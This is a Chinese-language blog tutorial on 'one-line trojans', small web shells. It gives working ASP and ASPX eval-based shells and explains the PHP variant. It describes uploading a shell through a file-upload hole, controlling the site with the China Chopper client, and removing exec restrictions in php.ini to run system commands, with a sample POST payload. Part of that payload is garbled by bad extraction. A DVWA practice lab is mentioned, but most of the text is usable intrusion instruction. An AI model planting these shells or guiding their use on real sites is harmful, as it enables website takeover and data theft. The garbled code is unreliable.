一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

常见的一句话木马:
php的一句话木马:
asp的一句话是: <%eval request (“pass”)%>
aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>

【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后可以在本地通过中国菜刀chopper.exe获取和控制整个网站目录。

入侵条件
(1)木马上传成功,未被杀(木马免杀);
(2)知道木马在网站存储的路径在哪;
(3)上传的木马能正常运行。

代码分析:
@的含义表示后面即使执行错误,也不报错。
eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[‘attack’]表示从页面中获得attack这个参数值(变量)。

php里面几个超全局变量: G E T 、 _GET、 GET_POST等。$_POST[‘a’]; 意思是a这个变量,用post的方法接收。
注意:传输数据的两种方法,get、post。post是在消息体存放数据,get是在消息头的url路径里存放数据(例如xxx.php?a=1)

eval()把字符串作为PHP代码执行。
例如:eval(“echo ‘b’”);等于直接执行了 echo ‘b’;再来看看首先,用post方式接收变量pw,比如接收到了:pw=echo ‘a’;这时代码就变成。结果执行:echo ‘a’
用post方法接收变量pw,把变量pw里面的字符串当做php代码来执行。也就是说,你想执行什么代码,就把什么代码放进变量pw里,用post传输给一句话木马。查看入侵主机硬盘可以用php函数:opendir()和readdir()等等。上存文件php函数:move_uploaded_file,相应的html要写好。想执行cmd命令,则用exec()。

当然前提是:php配置文件php.ini里,关掉安全模式safe_mode = off,然后禁用函数列表 disable_functions = proc_open, popen, exec, system, shell_exec ,把exec去掉,确保没有exec(有些cms为了方便处理某些功能,会去掉的)。

Post代码:
cmd=header(“Content-type:text/html;charset=gbk”);
exec(“ipconfig”, o u t ) ; e c h o ′ < p r e > ′ ; p r i n t r ( out); echo '

'; print_r( out);echo<pre>;printr(out);
echo ‘’;

工具:
DVWA是一款渗透测试的演练系统,入门找不到合适的靶机,推荐用DVWA。
“中国菜刀”页面操作说明:
1、是连接的URL,就是网站的主路径然后加上上传文件时回显的保存路径;
2、是菜刀连接时的密码,就是一句话提交的数据;
3、是一句话的解析类型,可以是asp,php,aspx。不同的解析类型的一句话内容不一样,文件后缀名不一样。

你可能感兴趣的:(一句话木马)